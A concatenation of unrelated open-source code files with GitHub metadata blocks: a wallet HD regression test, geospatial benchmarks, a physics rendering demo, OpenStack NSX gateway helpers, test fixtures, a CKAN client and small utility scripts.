self.sync_all()
def run_test (self):
tmpdir = self.options.tmpdir
        # Make sure we can't switch off usehd after wallet creation
stop_node(self.nodes[1],1)
try:
start_node(1, self.options.tmpdir, ['-usehd=0'])
raise AssertionError("Must not allow to turn off HD on an already existing HD wallet")
except Exception as e:
assert("yxomcoind exited with status 1 during initialization" in str(e))
# assert_start_raises_init_error(1, self.options.tmpdir, ['-usehd=0'], 'already existing HD wallet')
# self.nodes[1] = start_node(1, self.options.tmpdir, self.node_args[1])
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
connect_nodes_bi(self.nodes, 0, 1)
# Make sure we use hd, keep chainid
chainid = self.nodes[1].getwalletinfo()['hdchainid']
assert_equal(len(chainid), 64)
# create an internal key
change_addr = self.nodes[1].getrawchangeaddress()
        change_addrV = self.nodes[1].validateaddress(change_addr)
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/0") #first internal child key
# Import a non-HD private key in the HD wallet
non_hd_add = self.nodes[0].getnewaddress()
self.nodes[1].importprivkey(self.nodes[0].dumpprivkey(non_hd_add))
# This should be enough to keep the master key and the non-HD key
self.nodes[1].backupwallet(tmpdir + "/hd.bak")
#self.nodes[1].dumpwallet(tmpdir + "/hd.dump")
# Derive some HD addresses and remember the last
        # Also send funds to each address
self.nodes[0].generate(101)
hd_add = None
num_hd_adds = 300
for i in range(num_hd_adds):
hd_add = self.nodes[1].getnewaddress()
hd_info = self.nodes[1].validateaddress(hd_add)
assert_equal(hd_info["hdkeypath"], "m/44'/1'/0'/0/"+str(i+1))
assert_equal(hd_info["hdchainid"], chainid)
self.nodes[0].sendtoaddress(hd_add, 1)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(non_hd_add, 1)
self.nodes[0].generate(1)
# create an internal key (again)
change_addr = self.nodes[1].getrawchangeaddress()
        change_addrV = self.nodes[1].validateaddress(change_addr)
assert_equal(change_addrV["hdkeypath"], "m/44'/1'/0'/1/1") #second internal child key
self.sync_all()
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
print("Restore backup ...")
stop_node(self.nodes[1],1)
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/hd.bak", tmpdir + "/node1/regtest/wallet.dat")
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0'])
#connect_nodes_bi(self.nodes, 0, 1)
# Assert that derivation is deterministic
hd_add_2 = None
for _ in range(num_hd_adds):
hd_add_2 = self.nodes[1].getnewaddress()
hd_info_2 = self.nodes[1].validateaddress(hd_add_2)
assert_equal(hd_info_2["hdkeypath"], "m/44'/1'/0'/0/"+str(_+1))
assert_equal(hd_info_2["hdchainid"], chainid)
assert_equal(hd_add, hd_add_2)
# Needs rescan
stop_node(self.nodes[1],1)
self.nodes[1] = start_node(1, self.options.tmpdir, ['-usehd=1', '-keypool=0', '-rescan'])
#connect_nodes_bi(self.nodes, 0, 1)
assert_equal(self.nodes[1].getbalance(), num_hd_adds + 1)
        # send a tx and make sure it's using the internal chain for the change output
txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
        outs = self.nodes[1].decoderawtransaction(self.nodes[1].gettransaction(txid)['hex'])['vout']
keypath = ""
for out in outs:
if out['value'] != 1:
keypath = self.nodes[1].validateaddress(out['scriptPubKey']['addresses'][0])['hdkeypath']
assert_equal(keypath[0:13], "m/44'/1'/0'/1")
if __name__ == '__main__':
WalletHDTest().main ()
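
# Editor's note -- a hypothetical helper (not used by the test) spelling out
# the BIP44-style layout asserted above: m/purpose'/coin_type'/account'/
# change/index, where change=0 is the external (receive) chain and change=1
# the internal (change) chain.
def _bip44_keypath(index, internal=False, coin_type=1, account=0):
    return "m/44'/%d'/%d'/%d/%d" % (coin_type, account, 1 if internal else 0, index)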
| {
"content_hash": "c581f6a7c221e0017b9bd2973a162a0d",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 108,
"avg_line_length": 44.08411214953271,
"alnum_prop": 0.6109815560737757,
"repo_name": "YxomNPO/YxomCoin",
"id": "d7f6553cd9918b1b9bbdfa2d199470e2fcf3121c",
"size": "4997",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/wallet-hd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "M4",
"bytes": "145197"
},
{
"name": "Makefile",
"bytes": "63726"
},
{
"name": "Python",
"bytes": "741915"
},
{
"name": "QMake",
"bytes": "2059"
},
{
"name": "Roff",
"bytes": "3828"
},
{
"name": "Shell",
"bytes": "27654"
}
],
"symlink_target": ""
} |
"""Tests for filesystem elements, including Foxhound and related objects.
"""
import datreant as dtr
import pytest
import os
import py.path
class TestFoxhound:
"""Test Foxhound functionality"""
@pytest.fixture
def treant(self, tmpdir):
with tmpdir.as_cwd():
t = dtr.treants.Container('testtreant')
return t
@pytest.fixture
def group(self, tmpdir):
with tmpdir.as_cwd():
g = dtr.Group('testgroup')
return g
| {
"content_hash": "64da50b8fb9c0344b68dde236949ae7a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 73,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.6311475409836066,
"repo_name": "andreabedini/datreant",
"id": "6b83810385f03b91e02dbc0bf058b677bd89132a",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "datreant/tests/test_filesystem.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "164526"
}
],
"symlink_target": ""
} |
from shapely.geometry import Point
from geopandas import read_file, datasets, GeoSeries
# Derive list of valid query predicates based on underlying index backend;
# we have to create a non-empty instance of the index to get these
index = GeoSeries([Point(0, 0)]).sindex
predicates = sorted(p for p in index.valid_query_predicates if p is not None)
geom_types = ("mixed", "points", "polygons")
def generate_test_df():
world = read_file(datasets.get_path("naturalearth_lowres"))
capitals = read_file(datasets.get_path("naturalearth_cities"))
countries = world.to_crs("epsg:3395")[["geometry"]]
capitals = capitals.to_crs("epsg:3395")[["geometry"]]
mixed = capitals.append(countries) # get a mix of geometries
points = capitals
polygons = countries
# filter out invalid geometries
data = {
"mixed": mixed[mixed.is_valid],
"points": points[points.is_valid],
"polygons": polygons[polygons.is_valid],
}
# ensure index is pre-generated
for data_type in data.keys():
data[data_type].sindex.query(data[data_type].geometry.values.data[0])
return data
class BenchIntersection:
param_names = ["input_geom_type", "tree_geom_type"]
params = [
geom_types,
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
# cache bounds so that bound creation is not counted in benchmarks
self.bounds = {
data_type: [g.bounds for g in self.data[data_type].geometry]
for data_type in self.data.keys()
}
def time_intersects(self, input_geom_type, tree_geom_type):
tree = self.data[tree_geom_type].sindex
for bounds in self.bounds[input_geom_type]:
tree.intersection(bounds)
class BenchIndexCreation:
param_names = ["tree_geom_type"]
params = [
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
def time_index_creation(self, tree_geom_type):
"""Time creation of spatial index.
Note: requires running a single query to ensure that
lazy-building indexes are actually built.
"""
        # Note: the GeoDataFrame._sindex_generated attribute will
        # be removed by GH#1444 but is kept here (in the benchmarks)
        # so that we can compare pre GH#1444 to post GH#1444 if needed
self.data[tree_geom_type]._sindex_generated = None
self.data[tree_geom_type].geometry.values._sindex = None
tree = self.data[tree_geom_type].sindex
# also do a single query to ensure the index is actually
# generated and used
tree.query(self.data[tree_geom_type].geometry.values.data[0])
class BenchQuery:
param_names = ["predicate", "input_geom_type", "tree_geom_type"]
params = [
predicates,
geom_types,
geom_types,
]
def setup(self, *args):
self.data = generate_test_df()
def time_query_bulk(self, predicate, input_geom_type, tree_geom_type):
self.data[tree_geom_type].sindex.query_bulk(
self.data[input_geom_type].geometry.values.data,
predicate=predicate,
)
def time_query(self, predicate, input_geom_type, tree_geom_type):
tree = self.data[tree_geom_type].sindex
for geom in self.data[input_geom_type].geometry.values.data:
tree.query(geom, predicate=predicate)
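
# Editor's sketch: how one of these benchmarks can be exercised by hand,
# outside of asv. The parameter values are illustrative only and assume
# "intersects" is among the backend's valid query predicates.
if __name__ == "__main__":
    bench = BenchQuery()
    bench.setup()
    bench.time_query("intersects", "points", "polygons")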
| {
"content_hash": "2b5d87d0c6fd9a13369f980185e71fd1",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 77,
"avg_line_length": 32.88461538461539,
"alnum_prop": 0.6429824561403509,
"repo_name": "geopandas/geopandas",
"id": "24fac10e6883271ff9f83b45e77fe10c79e788d4",
"size": "3420",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "benchmarks/sindex.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "32111"
},
{
"name": "Python",
"bytes": "1304336"
},
{
"name": "Shell",
"bytes": "754"
}
],
"symlink_target": ""
} |
def main():
pass
if __name__ == '__main__':
main()
import os
import math
import ChronoEngine_python_core as chrono
import ChronoEngine_python_postprocess as postprocess
# ---------------------------------------------------------------------
#
# Create the simulation system.
# (Do not create parts and constraints programmatically here, we will
# load a mechanism from file)
my_system = chrono.ChSystem()
# Set the collision margins. This is especially important for very large or
# very small objects (as in this example)! Do this before creating shapes.
chrono.ChCollisionModel.SetDefaultSuggestedEnvelope(0.001)
chrono.ChCollisionModel.SetDefaultSuggestedMargin(0.001)
# ---------------------------------------------------------------------
#
# load the file generated by the SolidWorks CAD plugin
# and add it to the ChSystem
#
print ("Loading C::E scene...");
exported_items = chrono.ImportSolidWorksSystem('../../../data/solid_works/swiss_escapement')
print ("...done!");
# Print exported items
for my_item in exported_items:
print (my_item.GetName())
# Add items to the physical system
for my_item in exported_items:
my_system.Add(my_item)
# ---------------------------------------------------------------------
#
# Render a short animation by generating scripts
# to be used with POV-Ray
#
pov_exporter = postprocess.ChPovRay(my_system)
# Sets some file names for in-out processes.
pov_exporter.SetTemplateFile ("../../../data/_template_POV.pov")
pov_exporter.SetOutputScriptFile ("rendering_frames.pov")
if not os.path.exists("output"):
os.mkdir("output")
if not os.path.exists("anim"):
os.mkdir("anim")
pov_exporter.SetOutputDataFilebase("output/my_state")
pov_exporter.SetPictureFilebase("anim/picture")
# Sets the viewpoint, aimed point, lens angle
pov_exporter.SetCamera(chrono.ChVectorD(0.2,0.3,0.5), chrono.ChVectorD(0,0,0), 35)
# Sets the default ambient light and default light lamp
pov_exporter.SetAmbientLight(chrono.ChColor(1,1,0.9))
pov_exporter.SetLight(chrono.ChVectorD(-2,2,-1), chrono.ChColor(0.9,0.9,1.1), True)
# Sets other settings
pov_exporter.SetPictureSize(640,480)
pov_exporter.SetAmbientLight(chrono.ChColor(2,2,2))
# If wanted, turn on the rendering of COGs, reference frames, contacts:
#pov_exporter.SetShowCOGs (1, 0.05)
#pov_exporter.SetShowFrames(1, 0.02)
#pov_exporter.SetShowLinks(1, 0.03)
#pov_exporter.SetShowContacts(1,
# postprocess.ChPovRay.SYMBOL_VECTOR_SCALELENGTH,
# 0.01, # scale
# 0.0007, # width
# 0.1, # max size
# 1,0,0.5 ) # colormap on, blue at 0, red at 0.5
# Add additional POV objects/lights/materials in the following way, entering
# an optional text using the POV scene description language. This will be
# appended to the generated .pov file.
# For multi-line strings, use the python ''' easy string delimiter.
pov_exporter.SetCustomPOVcommandsScript(
'''
light_source{ <1,3,1.5> color rgb<0.9,0.9,0.8> }
''')
# Tell which physical items you want to render
pov_exporter.AddAll()
# 1) Create the two .pov and .ini files for POV-Ray (this must be done
# only once at the beginning of the simulation).
pov_exporter.ExportScript()
# Configure the solver, if needed
my_system.SetSolverType(chrono.ChSolver.Type_BARZILAIBORWEIN)
my_system.SetMaxItersSolverSpeed(40)
my_system.SetMaxPenetrationRecoverySpeed(0.002)
my_system.Set_G_acc(chrono.ChVectorD(0,-9.8,-9.80))
# Perform a short simulation
nstep =0
while (my_system.GetChTime() < 1.2) :
my_system.DoStepDynamics(0.002)
#if math.fmod(nstep,10) ==0 :
print ('time=', my_system.GetChTime() )
# 2) Create the incremental nnnn.dat and nnnn.pov files that will be load
# by the pov .ini script in POV-Ray (do this at each simulation timestep)
pov_exporter.ExportData()
nstep = nstep +1
| {
"content_hash": "d089c693a4a8c07fb3c20e8033a34c0f",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 92,
"avg_line_length": 30.73643410852713,
"alnum_prop": 0.6610340479192938,
"repo_name": "tjolsen/chrono",
"id": "8b455de89219650b451cd77e9ddf5a407bf68e48",
"size": "4297",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/demos/python/demo_solidworks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2059577"
},
{
"name": "C++",
"bytes": "16034231"
},
{
"name": "CMake",
"bytes": "369296"
},
{
"name": "CSS",
"bytes": "170229"
},
{
"name": "Cuda",
"bytes": "263283"
},
{
"name": "GLSL",
"bytes": "4731"
},
{
"name": "HTML",
"bytes": "8318"
},
{
"name": "Inno Setup",
"bytes": "23502"
},
{
"name": "JavaScript",
"bytes": "4731"
},
{
"name": "Objective-C",
"bytes": "46356"
},
{
"name": "POV-Ray SDL",
"bytes": "23109"
},
{
"name": "Python",
"bytes": "106362"
}
],
"symlink_target": ""
} |
from oslo_serialization import jsonutils
from neutron.openstack.common import log
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
from neutron.plugins.vmware import nsxlib
from neutron.plugins.vmware.nsxlib import switch
HTTP_GET = "GET"
HTTP_POST = "POST"
HTTP_DELETE = "DELETE"
HTTP_PUT = "PUT"
GWSERVICE_RESOURCE = "gateway-service"
TRANSPORTNODE_RESOURCE = "transport-node"
LOG = log.getLogger(__name__)
def create_l2_gw_service(cluster, tenant_id, display_name, devices):
"""Create a NSX Layer-2 Network Gateway Service.
:param cluster: The target NSX cluster
    :param tenant_id: Identifier of the OpenStack tenant for which
                      the gateway service is created.
:param display_name: Descriptive name of this gateway service
:param devices: List of transport node uuids (and network
interfaces on them) to use for the network gateway service
:raise NsxApiException: if there is a problem while communicating
with the NSX controller
"""
# NOTE(salvatore-orlando): This is a little confusing, but device_id in
# NSX is actually the identifier a physical interface on the gateway
# device, which in the Neutron API is referred as interface_name
gateways = [{"transport_node_uuid": device['id'],
"device_id": device['interface_name'],
"type": "L2Gateway"} for device in devices]
gwservice_obj = {
"display_name": utils.check_and_truncate(display_name),
"tags": utils.get_tags(os_tid=tenant_id),
"gateways": gateways,
"type": "L2GatewayServiceConfig"
}
return nsxlib.do_request(
HTTP_POST, nsxlib._build_uri_path(GWSERVICE_RESOURCE),
jsonutils.dumps(gwservice_obj), cluster=cluster)
def plug_l2_gw_service(cluster, lswitch_id, lport_id,
gateway_id, vlan_id=None):
"""Plug a Layer-2 Gateway Attachment object in a logical port."""
att_obj = {'type': 'L2GatewayAttachment',
'l2_gateway_service_uuid': gateway_id}
if vlan_id:
att_obj['vlan_id'] = vlan_id
return switch.plug_interface(cluster, lswitch_id, lport_id, att_obj)
def get_l2_gw_service(cluster, gateway_id):
return nsxlib.do_request(
HTTP_GET, nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
cluster=cluster)
def get_l2_gw_services(cluster, tenant_id=None,
fields=None, filters=None):
actual_filters = dict(filters or {})
if tenant_id:
actual_filters['tag'] = tenant_id
actual_filters['tag_scope'] = 'os_tid'
return nsxlib.get_all_query_pages(
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
filters=actual_filters),
cluster)
def update_l2_gw_service(cluster, gateway_id, display_name):
# TODO(salvatore-orlando): Allow updates for gateways too
gwservice_obj = get_l2_gw_service(cluster, gateway_id)
if not display_name:
# Nothing to update
return gwservice_obj
gwservice_obj["display_name"] = utils.check_and_truncate(display_name)
return nsxlib.do_request(HTTP_PUT,
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
jsonutils.dumps(gwservice_obj), cluster=cluster)
def delete_l2_gw_service(cluster, gateway_id):
nsxlib.do_request(HTTP_DELETE,
nsxlib._build_uri_path(GWSERVICE_RESOURCE,
resource_id=gateway_id),
cluster=cluster)
def _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid):
connector_type_mappings = {
utils.NetworkTypes.STT: "STTConnector",
utils.NetworkTypes.GRE: "GREConnector",
utils.NetworkTypes.BRIDGE: "BridgeConnector",
'ipsec%s' % utils.NetworkTypes.STT: "IPsecSTT",
'ipsec%s' % utils.NetworkTypes.GRE: "IPsecGRE"}
nsx_connector_type = connector_type_mappings.get(connector_type)
body = {"display_name": utils.check_and_truncate(display_name),
"tags": utils.get_tags(os_tid=tenant_id,
q_gw_dev_id=neutron_id),
"admin_status_enabled": True}
if connector_ip and nsx_connector_type:
body["transport_connectors"] = [
{"transport_zone_uuid": tz_uuid,
"ip_address": connector_ip,
"type": nsx_connector_type}]
if client_certificate:
body["credential"] = {"client_certificate":
{"pem_encoded": client_certificate},
"type": "SecurityCertificateCredential"}
return body
def create_gateway_device(cluster, tenant_id, display_name, neutron_id,
tz_uuid, connector_type, connector_ip,
client_certificate):
body = _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid)
try:
return nsxlib.do_request(
HTTP_POST, nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE),
jsonutils.dumps(body, sort_keys=True), cluster=cluster)
except api_exc.InvalidSecurityCertificate:
raise nsx_exc.InvalidSecurityCertificate()
def update_gateway_device(cluster, gateway_id, tenant_id,
display_name, neutron_id,
tz_uuid, connector_type, connector_ip,
client_certificate):
body = _build_gateway_device_body(tenant_id, display_name, neutron_id,
connector_type, connector_ip,
client_certificate, tz_uuid)
try:
return nsxlib.do_request(
HTTP_PUT,
nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE,
resource_id=gateway_id),
jsonutils.dumps(body, sort_keys=True), cluster=cluster)
except api_exc.InvalidSecurityCertificate:
raise nsx_exc.InvalidSecurityCertificate()
def delete_gateway_device(cluster, device_uuid):
return nsxlib.do_request(HTTP_DELETE,
nsxlib._build_uri_path(TRANSPORTNODE_RESOURCE,
device_uuid),
cluster=cluster)
def get_gateway_device_status(cluster, device_uuid):
status_res = nsxlib.do_request(HTTP_GET,
nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
device_uuid,
extra_action='status'),
cluster=cluster)
# Returns the connection status
return status_res['connection']['connected']
def get_gateway_devices_status(cluster, tenant_id=None):
if tenant_id:
gw_device_query_path = nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
fields="uuid,tags",
relations="TransportNodeStatus",
filters={'tag': tenant_id,
'tag_scope': 'os_tid'})
else:
gw_device_query_path = nsxlib._build_uri_path(
TRANSPORTNODE_RESOURCE,
fields="uuid,tags",
relations="TransportNodeStatus")
response = nsxlib.get_all_query_pages(gw_device_query_path, cluster)
results = {}
for item in response:
results[item['uuid']] = (item['_relations']['TransportNodeStatus']
['connection']['connected'])
return results
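
# Editor's sketch (identifiers invented): the `devices` argument documented
# in create_l2_gw_service maps each transport node to one of its physical
# interfaces, e.g.:
EXAMPLE_L2GW_DEVICES = [
    {'id': 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee',  # transport node UUID
     'interface_name': 'breth0'},                   # device_id in NSX terms
]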
| {
"content_hash": "4d547997d8252fde14351c546b803d25",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 77,
"avg_line_length": 40.88265306122449,
"alnum_prop": 0.5897915886684139,
"repo_name": "cloudbase/neutron-virtualbox",
"id": "5e20d2d51c3ce9623319377b9160e278b3face3c",
"size": "8642",
"binary": false,
"copies": "1",
"ref": "refs/heads/virtualbox_agent",
"path": "neutron/plugins/vmware/nsxlib/l2gateway.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1043"
},
{
"name": "Python",
"bytes": "8448838"
},
{
"name": "Shell",
"bytes": "12510"
}
],
"symlink_target": ""
} |
from mezzanine.utils.email import send_mail_template
from mezzanine.conf import settings
def send_invite_code_mail(code, site_url, login_url):
context = {
'code': code,
'site_name': settings.SITE_TITLE,
'site_url': site_url,
'login_url': login_url,
}
send_mail_template(
"Your Invitation to %s" % settings.SITE_TITLE,
"invites/send_invite_email",
settings.DEFAULT_FROM_EMAIL,
code.registered_to,
context=context,
fail_silently=False,
)
| {
"content_hash": "389c4a353195096aaa26f5a4e7054132",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 54,
"avg_line_length": 26.75,
"alnum_prop": 0.6149532710280374,
"repo_name": "averagehuman/mezzanine-invites",
"id": "22664820988d9cb053d139af0d215c3db5e28a4f",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "invites/utils.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "51079"
}
],
"symlink_target": ""
} |
import requests
class Parla(object):
r = requests
api_key = None
version = 3
base_url = 'http://demo.ckan.org/api/{version}/action/'
resp = None # response from server
resp_status = None # shortcut to response.status_code
resp_headers = None # shortcut to response.status_code
resp_json = None # shortcut to response.json()
results = [] # shortcut to resp.json().get('results', [])
help = None # shortcut to provided api help
def __init__(self, api_key=None, *args, **kwargs):
self.api_key = api_key
self.resp = None
self.resp_status = None
self.resp_headers = None
self.resp_json = None
self.results = []
self.help = None
self.version = kwargs.get('version', self.version)
@property
def headers(self):
"""
Allow custom authorisation header to be passed in
"""
return {'authorization': self.api_key} if self.api_key is not None else None
@property
def endpoint(self):
base_url = self.base_url.format(version=self.version) # allow user to override the version
return '%s%s' % (base_url, self.action)
def response(self, resp):
self.resp = resp
self.resp_status = resp.status_code
self.resp_headers = resp.headers
self.resp_json = resp.json()
self.results = [] # reset
self.help = None # reset
if self.resp_status in [200] and 'result' in self.resp_json:
self.results = self.resp_json.get('result', [])
if 'help' in self.resp_json:
self.help = self.resp_json.get('help', None)
return resp
def get(self, **kwargs):
self.response(self.r.get(self.endpoint, params=kwargs, headers=self.headers))
return self.results
class Packages(Parla):
action = 'package_list'
    def __init__(self, *args, **kwargs):
        super(Packages, self).__init__(*args, **kwargs)
        self.action = 'package_list'  # reset
def search(self, q, **kwargs):
self.action = 'package_search'
return super(Packages, self).get(q=q, **kwargs)
class Groups(Parla):
action = 'group_list'
class Tags(Parla):
    action = 'tag_list'
class Resource(Parla):
action = 'resource_search'
    def get(self, q, n='name', **kwargs):
q = '%s:%s' % (n, q) # build search query
return super(Resource, self).get(query=q, **kwargs)
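
# Editor's usage sketch: querying the demo CKAN endpoint hard-coded above.
if __name__ == '__main__':
    pkgs = Packages()
    print(pkgs.search('climate'))  # dispatches to the package_search action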
| {
"content_hash": "d9241b17e9707d9ac152655c47cde38d",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 99,
"avg_line_length": 29.24390243902439,
"alnum_prop": 0.5963302752293578,
"repo_name": "rosscdh/ckan-parliament-uk",
"id": "9a0538b29178636a56663a36edabbaf11d909df1",
"size": "2422",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ckan_sdk/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1054"
}
],
"symlink_target": ""
} |
from urllib.parse import quote
import pytest
from tests.functional import get_logger
from tests.functional.services.api.conftest import USER_API_CONFS
from tests.functional.services.api.registries import get_registry_info
from tests.functional.services.utils.http_utils import (
RequestFailedError,
http_del,
http_post,
)
_logger = get_logger(__name__)
@pytest.fixture(scope="session", autouse=True)
def add_image_to_local_registry(docker_client):
"""
Pull alpine:latest to local environment, and re-tag it for the local docker-registry
Note: if the docker registry run by scripts/ci/docker-compose-ci.yaml is not up,
this will fail
"""
registry_info = get_registry_info()
_logger.info("Pulling alpine:latest image from remote")
docker_client.images.pull("alpine:latest")
_logger.info("Re-tagging as the local docker registry's image")
local_image = "{}/alpine".format(registry_info["host"])
rc = docker_client.api.tag("alpine:latest", local_image, "latest")
if not rc:
raise RequestFailedError(rc, "docker_client:tag", None)
# Login to the Local Registry (running from scripts/ci/docker-compose-ci.yaml)
_logger.info("Ensure we are logged into the local docker registry")
docker_client.login(
username=registry_info["user"],
password=registry_info["pass"],
registry=registry_info["host"],
)
_logger.info("Push the re-tagged image to the local docker registry")
docker_client.images.push(local_image, "latest")
@pytest.fixture(scope="class", params=USER_API_CONFS)
def add_and_teardown_registry(request):
registry_info = get_registry_info()
registry_payload = {
"registry": registry_info["service_name"],
"registry_name": registry_info["host"].split(":")[0],
"registry_pass": registry_info["pass"],
"registry_type": "docker_v2",
"registry_user": registry_info["user"],
"registry_verify": False,
}
_logger.info("Adding Registry. APIConf={}".format(str(request.param.__name__)))
add_registry_resp = http_post(
["registries"], registry_payload, config=request.param
)
if add_registry_resp.code != 200:
raise RequestFailedError(
add_registry_resp.url, add_registry_resp.code, add_registry_resp.body
)
def remove_registry():
_logger.info(
"Removing Registry. APIConf={}".format(str(request.param.__name__))
)
remove_resp = http_del(
["registries", quote(registry_info["service_name"])], config=request.param
)
if remove_resp.code != 200:
raise RequestFailedError(
remove_resp.url,
remove_resp.code,
"" if not hasattr(remove_resp, "body") else remove_resp.body,
)
request.addfinalizer(remove_registry)
return add_registry_resp, request.param
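
# Editor's sketch (hypothetical; real tests live in the sibling test
# modules): how a test would consume the parametrised fixture above.
class _ExampleRegistryTest:
    def test_add_registry_ok(self, add_and_teardown_registry):
        add_registry_resp, api_conf = add_and_teardown_registry
        assert add_registry_resp.code == 200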
| {
"content_hash": "f29b3485e313928a0fe08620c0227468",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 88,
"avg_line_length": 35.670731707317074,
"alnum_prop": 0.6564102564102564,
"repo_name": "anchore/anchore-engine",
"id": "96e9b7ca5a5e0e79b6e47a5a0fa7dd348df8f562",
"size": "2925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/functional/services/api/registries/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3889"
},
{
"name": "Dockerfile",
"bytes": "10954"
},
{
"name": "Makefile",
"bytes": "12274"
},
{
"name": "Python",
"bytes": "4529553"
},
{
"name": "Shell",
"bytes": "16598"
}
],
"symlink_target": ""
} |
'''
Script that gets
# Uptime when running config last changed
ccmHistoryRunningLastChanged = '1.3.6.1.4.1.9.9.43.1.1.1.0'
and
# Uptime when startup config last saved
ccmHistoryStartupLastChanged = '1.3.6.1.4.1.9.9.43.1.1.3.0'
compares them and decides whether or not the latest changes in running-config are saved in startup-config
'''
# Import Kirk's module
from snmp_helper import snmp_get_oid, snmp_extract
# Define variables
device = "1.1.1.1"
community = "*****"
snmp_port = "161"
run_last_change_oid = "1.3.6.1.4.1.9.9.43.1.1.1.0"
start_last_change_oid = "1.3.6.1.4.1.9.9.43.1.1.3.0"
sys_uptime_oid = "1.3.6.1.2.1.1.3.0"
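# Note (editor): all three OIDs above return SNMP TimeTicks, i.e. hundredths
# of a second since the agent started -- hence the division by 100 further
# down to convert the difference into seconds.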
# Define device tuple
a_device = (device, community, snmp_port)
#Query data
run_last_change = snmp_extract(snmp_get_oid(a_device, run_last_change_oid,))
start_last_change = snmp_extract(snmp_get_oid(a_device, start_last_change_oid,))
sys_uptime = snmp_extract(snmp_get_oid(a_device, sys_uptime_oid,))
#Convert data in integer
if run_last_change.isdigit() and start_last_change.isdigit() and sys_uptime.isdigit():
run_last_change = int(run_last_change)
start_last_change = int(start_last_change)
sys_uptime = int(sys_uptime)
else:
exit("Error with SNMP response (non digits)")
if start_last_change == 0 and run_last_change > 3000:
exit("Config was never saved to startup since last reboot, but running-config was changed")
if start_last_change >= run_last_change:
exit("All right, last changes was saved to startup config")
else:
dif_time = (sys_uptime - start_last_change) / 100
exit("Last changes to running config wasn't saved to startup %d seconds already" % dif_time)
# The END
| {
"content_hash": "3bec1725bb7e37c4e6e6605f403cffa7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 100,
"avg_line_length": 33.816326530612244,
"alnum_prop": 0.7054918527459264,
"repo_name": "laetrid/learning",
"id": "32ef61edf06763f7141919e6308f628ea3892a84",
"size": "1680",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Second_course/ex1_2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "56054"
}
],
"symlink_target": ""
} |
"""
Created on Jun 19, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
import pyocni.TDD.fake_Data.categories as f_categories
import pyocni.TDD.fake_Data.entities as f_entities
import pycurl
def init_fakeDB():
"""
    Fill the database with fake data
"""
add_fake_action()
add_fake_kind()
add_fake_mixin()
add_fake_resource()
def add_fake_kind():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_categories.kind)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_mixin():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_categories.mixin)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_action():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
